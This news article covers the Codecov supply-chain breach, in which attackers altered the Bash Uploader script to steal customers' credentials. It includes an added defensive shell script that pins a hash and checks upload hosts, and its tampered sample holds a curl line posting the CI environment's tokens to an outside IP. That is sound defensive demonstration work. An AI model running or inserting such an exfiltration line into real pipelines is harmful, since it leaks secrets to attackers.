As the scale of its impact becomes clearer, the recent Codecov system breach is drawing comparisons to the SolarWinds attacks, which the U.S. government has attributed to the Russian Foreign Intelligence Service (SVR). Reuters investigators have found that hundreds of customer networks were breached as a result of the compromise of Codecov's systems.
As we reported last week, in a supply-chain attack on Codecov that went undetected for over two months, threat actors managed to steal Codecov developers' credentials using doctored Docker images. The attackers then exfiltrated Codecov customers' credentials by replacing Codecov's IP address in the Bash Uploader script.
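The defensive counterpart to the modification described above is to treat a downloaded uploader script as untrusted input. The following POSIX shell gate is an added illustration, not Codecov's own tooling and not part of the original article: it pins the script to a SHA-256 recorded at review time and refuses to run any copy whose upload targets include a host outside an allowlist. The host name, the IP address, the file names and both sample scripts are constructed for the demo.

```shell
#!/bin/sh
# Added example: gate a CI uploader script on a pinned hash and an upload-host
# allowlist before executing it. All names and sample scripts are constructed.

# Hosts the genuine uploader is allowed to send data to (assumed for the demo).
ALLOWED_HOSTS="uploader.example.com"

# Portable SHA-256: GNU coreutils sha256sum or BSD/macOS shasum.
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  else
    shasum -a 256 "$1" | awk '{print $1}'
  fi
}

# Returns 0 when the file's hash equals the pinned value, 1 otherwise.
check_pinned_hash() {
  local file="$1" expected="$2"
  [ "$(sha256_of "$file")" = "$expected" ]
}

# Extracts every http(s) host mentioned in the script and returns 1 if any of
# them is missing from ALLOWED_HOSTS. Catches a second, unexpected upload target.
check_upload_targets() {
  local file="$1" hosts h bad=0
  hosts=$(grep -Eo 'https?://[A-Za-z0-9.-]+' "$file" | sed -E 's#https?://##' | sort -u)
  for h in $hosts; do
    case " $ALLOWED_HOSTS " in
      *" $h "*) ;;  # on the allowlist
      *) echo "unexpected upload target: $h" >&2; bad=1 ;;
    esac
  done
  return $bad
}

# Both gates must pass; the caller then runs the script (e.g. sh "$file").
uploader_is_safe() {
  local file="$1" expected="$2"
  check_pinned_hash "$file" "$expected" || { echo "hash mismatch: $file" >&2; return 1; }
  check_upload_targets "$file" || { echo "unexpected host in: $file" >&2; return 1; }
  return 0
}

# --- constructed demo inputs ---------------------------------------------
DEMO_DIR=$(mktemp -d)
CLEAN="$DEMO_DIR/uploader.sh"
TAMPERED="$DEMO_DIR/uploader-tampered.sh"

cat > "$CLEAN" <<'EOF'
#!/bin/sh
# constructed stand-in for a coverage uploader: one legitimate upload target
curl -sS -X POST --data-binary @coverage.xml https://uploader.example.com/upload
EOF

cat > "$TAMPERED" <<'EOF'
#!/bin/sh
# constructed stand-in for a coverage uploader: one legitimate upload target
curl -sS -X POST --data-binary @coverage.xml https://uploader.example.com/upload
# injected line: ships the CI environment (tokens, keys) to a host that is not ours
curl -sS -X POST --data "$(env)" https://203.0.113.10/upload
EOF

# The pin is recorded once, at review time, from a copy that was inspected;
# it is NOT recomputed from whatever the pipeline downloaded later.
PINNED=$(sha256_of "$CLEAN")

# Demo: the reviewed copy passes both gates, the altered copy fails both.
uploader_is_safe "$CLEAN" "$PINNED" && echo "clean copy: OK to run"
uploader_is_safe "$TAMPERED" "$PINNED" || echo "tampered copy: blocked"
```

The hash pin alone already blocks the altered copy; the allowlist scan is the second, independent signal that tells a reviewer why it changed, which is the question that matters when a vendor script is updated legitimately and the pin has to be refreshed.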
Codecov is an online software testing platform that integrates with GitHub projects and is used in thousands of projects by over 29,000 enterprises that build software. Codecov's customers include IBM, Hewlett Packard, GoDaddy, Atlassian, The Washington Post and Procter & Gamble (P&G).
It was not until April 1st that the company found out about the malicious activity. The incident soon got the attention of U.S. federal investigators, since the breach was in a supply chain, and the attack has been compared to the SolarWinds attacks.
According to federal investigators, the Codecov attackers managed to tap into hundreds of client networks, reaching far beyond Codecov's own systems. The hackers could have gained credentials for thousands of other systems and products, according to the investigators.
“The hackers put extra effort into using Codecov to get inside other makers of software development programs, as well as companies that themselves provide many customers with technology services, including IBM,” a federal investigator anonymously told Reuters.
According to BleepingComputer, some Codecov clients, including IBM, stated that their code has not been modified, but declined to comment on whether their systems had been breached.
The full impact of this incident is still unclear, and U.S. federal investigators are now looking into it.